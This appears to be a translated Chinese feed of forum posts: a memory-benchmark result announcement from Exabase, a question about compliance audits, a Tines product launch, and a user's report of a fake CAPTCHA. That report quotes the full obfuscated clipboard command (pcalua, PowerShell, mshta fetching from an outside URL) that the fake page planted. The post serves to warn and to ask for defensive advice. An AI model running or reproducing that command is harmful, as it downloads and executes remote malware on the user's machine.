大家好,我是Johnny,Exabase的创始人。我们刚刚在BEAM这个最具挑战性的AI记忆基准测试中,在每个规模(最高可达1000万标记)上达到了最高的报告分数。我们还使用了Gemini 3 Flash进行评估,而之前的所有领先者都依赖于一个更大的模型(Gemini 3 Pro)。
在1000万标记的规模下,这一规模远远超出了任何模型的上下文窗口,因此上下文填充并不是一个选项(除了大窗口中只有大约一半的内容可以有效利用而不会降低性能)。获得高分的唯一方法是依靠根本有效的回忆。
我们的系统(M-1)在100K时得分为76.9%,在1M时为75.0%,在10M时为68.0%。之前的领先者Hindsight的得分分别为73.4%、73.9%和64.1%,而Honcho的得分为63.0%、63.1%和40.6%,两者均使用Gemini 3 Pro,而我们使用的是Flash。
我们发现竞争差距在规模上变得更大:在100K时领先Hindsight 3.5分,在10M时领先3.9分。与Honcho的差距则从13.9分扩大到27.4分。随着语料库的增大,它过滤出了有效的回忆与强行推理/模型能力之间的差异。
M-1在每个查询中消耗的标记数量比下一个最佳系统少约20%。
关于BEAM基准测试:
BEAM测试十种记忆能力,包括一些其他基准测试未覆盖的能力:矛盾解决、事件排序和指令跟随。1000万标记的规模大致相当于与大型语言模型进行一年的长时间日常对话。
当然,我们的系统仍然远非完美,在某些类别(偏好跟随、指令跟随、摘要、回避)上表现强劲,得分在1000万标记规模下均保持在90%以上。
而我们的系统在其他方面则表现较弱:例如,多会话推理在100K时得分为44.7%,在10M时降至9.6%。尽管这个挑战似乎是这个规模下所有记忆系统的普遍问题,而非M-1特有的问题。这是我们将继续努力的方向。
方法论:
我们分支了Hindsight的开源基准测试脚本,替换了检索层,并对运行器的提示结构进行了小幅调整以便于生产使用。完整的方法论、三个规模的结果JSON以及提示生成器的链接都在论文中(论文链接见下)。
结合我们的LongMemEval结果(96.4%),M-1现在是唯一一个在所有主要记忆基准测试中,在每个规模(从115K到1000万标记)上都保持SOTA的系统。
研究论文:https://exabase.io/research/exabase-achieves-state-of-the-art-on-beam-benchmark
欢迎讨论架构、基准测试、规模挑战等话题。
返回首页
最新
合规软件如 Vanta、Drata 等仅能读取第三方 API(如 AWS、Github、Okta 等),但无法自动审计实际使用这些 API 的应用程序,例如,某个时间点谁在您的应用中拥有管理员访问权限。
我是一名来自波兰的工程师,没有合规背景,因此如果您过去对您的应用进行了审计(如 SOC 2/ISO 27001/HIPAA/PCI 等):
1. 您产生了什么结果(截图?SQL 查询?CSV 文件?)
2. 您公司中是谁负责的?花了多长时间?这是一个重复性的任务吗?
3. 您是否为此在内部开发了任何工具?现在还在维护吗?
如果您使用了某个工具,我将非常感激您告诉我是哪一个。
大家好,
今天早上,当我开始上班时,我想先浏览一些新闻博客/网站来开启新的一天。当我访问 Crooked Timber 时,却看到一个验证码页面,看起来像是传统的 Google 验证码。
我点击了它,加载旋转图标转动,右侧弹出了一个框,显示着传统的“验证您是人类”的白色标题,背景是蓝色的。
它显示了两个“手动验证步骤”:
1. 按下 Win + R
2. 按下 Ctrl + V,然后点击运行
起初我以为这是新型验证码,用来检查物理键盘是否连接到浏览器。但我立刻意识到这是试图让我在我的机器上运行一个脚本。
我打开了一个新的窗口,令我惊讶的是,我的剪贴板中有一些新内容:
“pcalua -a "PowerShell" -c "saps cmd '/v/c m^s^h^t^a h^t^t^p^s^:^//fine-work-team.com/6272' -Wi Hi"”
我将其提交给我工作可以访问的一个大型语言模型,它告诉我绝对不要运行这个命令(我本来就不打算运行),并解释说这个命令会从该 URL 下载并运行一个脚本。
我该如何在未来保护自己免受这些诈骗/黑客尝试?我一直认为自己是“准备好的”,但这次让我感到惊讶。
你们之前遇到过这种情况吗?你们是如何保护自己的?
大家好!我是Tines的Yannick,今天非常兴奋地与大家分享我们即将推出的产品。
Tines 3B是我们为团队构建代理、应用程序和自动化工具而开发的新产品,基于这样一个假设:人们已经在进行这些工作,无论IT或安全部门是否知情。
金融、市场营销等领域的团队正在使用Claude Code或Codex构建仪表盘。这些工作并没有恶意,大家只是按照要求在做事。问题在于,这些工作没有安全的运行方式:最终它们会存储在个人电脑或个人账户中,凭证直接粘贴在代码里,其他人无法看到这些内容的存在。
Tines 3B就是为了解决这个问题而诞生的:每个人仍然可以以相同的方式构建,但它在IT和安全部门能够实际看到和控制的环境中执行。
我们的产品以代码为中心,用户只需描述所需功能,您的大语言模型(LLM)将负责实现,执行过程是隔离的,凭证通过代理处理,而不是嵌入在代码中。
我们的另一款产品在过去8年里一直在安全和IT团队的最敏感系统中运行。这是同样的根本问题(谁可以访问什么,谁可以看到这些内容),只是针对新一类的构建者。
我们的探索版永久免费,完全自助服务:<a href="https://login.tines.com/saml_idp/signup" rel="nofollow">https://login.tines.com/saml_idp/signup</a>